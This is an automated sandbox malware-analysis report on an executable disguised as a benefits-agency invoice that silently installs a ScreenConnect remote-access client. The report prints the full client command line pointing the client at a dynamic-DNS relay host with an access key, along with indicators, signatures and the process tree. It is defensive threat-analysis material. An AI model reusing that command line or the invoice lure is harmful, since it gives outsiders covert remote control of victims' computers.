Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice-benefits-agency9-24-2024.exe

Overview

General Information

Sample name:invoice-benefits-agency9-24-2024.exe
Analysis ID:1523872
MD5:00cd8ce405a29bad77e5caec894b44a0
SHA1:016154e4ea41864e8c4b689c9f7ac7cceda5c7db
SHA256:ec0f1ec3f107b3559c97f1db4f9a1ae04481f2893c20b2e071f855309d7cc8ed
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • invoice-benefits-agency9-24-2024.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe" MD5: 00CD8CE405A29BAD77E5CAEC894B44A0)
    • msiexec.exe (PID: 7640 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7704 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7756 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BC344CC8D534C153146082E5C0B08418 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7808 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI22D5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6103906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7864 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8260A170A10C2A63DD060DA2E17AE0B9 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7916 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding EC3C4A72C16F999398D301E804ECE99B E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7956 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 8024 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "b39d397f-880b-4274-a788-d5e0ae46124e" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 8152 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "2a312dd1-915e-4a70-b7fc-6da8f9a2cf4a" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
invoice-benefits-agency9-24-2024.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\5d26dd.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSI299C.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1366628403.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000002.2593006992.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000000.00000002.1357879683.0000000003521000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.invoice-benefits-agency9-24-2024.exe.5fa0000.8.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      9.0.ScreenConnect.WindowsClient.exe.cd0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        9.2.ScreenConnect.WindowsClient.exe.306fa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          10.2.ScreenConnect.WindowsClient.exe.276fa60.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.invoice-benefits-agency9-24-2024.exe.5fa0000.8.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c=", ProcessId: 7956, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7704, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: invoice-benefits-agency9-24-2024.exeReversingLabs: Detection: 18%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.6% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04060F08 CryptProtectData,8_2_04060F08
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_040616F0 CryptProtectData,8_2_040616F0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05DA0674 CryptUnprotectData,8_2_05DA0674
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05DA2EA9 CryptUnprotectData,8_2_05DA2EA9
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05DA066D CryptUnprotectData,8_2_05DA066D
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeEXE: msiexec.exeJump to behavior
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: certificate valid
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452789959.0000000002682000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2607687774.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2593006992.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452583861.0000000002530000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453076491.00000000026C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1388670525.0000000000A8D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1365745532.00000000049C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: invoice-benefits-agency9-24-2024.exe, MSI29CB.tmp.3.dr, 5d26de.msi.3.dr, MSI299C.tmp.3.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2607687774.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: invoice-benefits-agency9-24-2024.exe, MSI22D5.tmp.2.dr, 5d26de.msi.3.dr, setup.msi.0.dr, 5d26dc.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452789959.0000000002682000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2607687774.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: invoice-benefits-agency9-24-2024.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: unknownDNS query: name: mmf351.ddns.net
                              Source: global trafficTCP traffic: 192.168.2.11:49703 -> 79.110.49.16:8041
                              Source: Joe Sandbox ViewASN Name: OTAVANET-ASCZ OTAVANET-ASCZ
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: mmf351.ddns.net
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459561536.0000000012700000.00000004.00000800.00020000.00000000.sdmp, invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2594997092.0000000001CFD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363773395.00000000049C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
